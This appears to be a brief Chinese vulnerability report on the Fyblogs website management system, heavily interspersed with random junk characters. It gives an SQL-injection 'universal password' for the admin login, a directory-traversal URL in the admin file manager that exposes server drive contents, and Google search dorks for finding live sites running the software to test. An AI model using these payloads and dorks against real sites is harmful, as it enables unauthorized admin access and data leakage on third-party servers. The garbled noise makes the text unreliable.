漏洞类型: 未授权访问/权限绕过
5 e1 P0 _/ Q' ~: ~" D' x/ d" E# U$ h) Z- T
简要描述:
! R, M- X, F; F7 F2 x8 Q7 i) E M7 M* {$ [
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
* Y% d) f1 [$ B1 Z6 H- C( j" Y7 R& R5 p @9 E
详细说明:" D6 \9 q4 k9 d. m% r
& c/ \% R' M' H d7 y) O$ \- m
后台万能密码 'or'='or'
# w: ?) i0 U7 i% D- C后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
7 O" d- P: Z( oadmin/uploadfile.asp?currentFolder=/upfiles/../7 `( W- z( n3 X: E! `
- T, o* e Q: B漏洞证明:
5 s, [0 z1 @0 U! [/ H4 u. I {$ ~9 j y% L- X
谷歌:inurl:type.asp?id=1 新闻中心
, A! T1 {3 F) f( Y- P0 b7 |6 j或者 :inurl:download_ok.asp?6 c5 v* w# H( k# v
) B- P4 W/ P0 ~) f8 \7 [4 p P
可以测试
. [* r" c- I+ N7 V, _+ Y5 D9 B6 r' g g3 Y7 {; k0 S
6 D* ?- ^* F% ~4 F; w8 k
|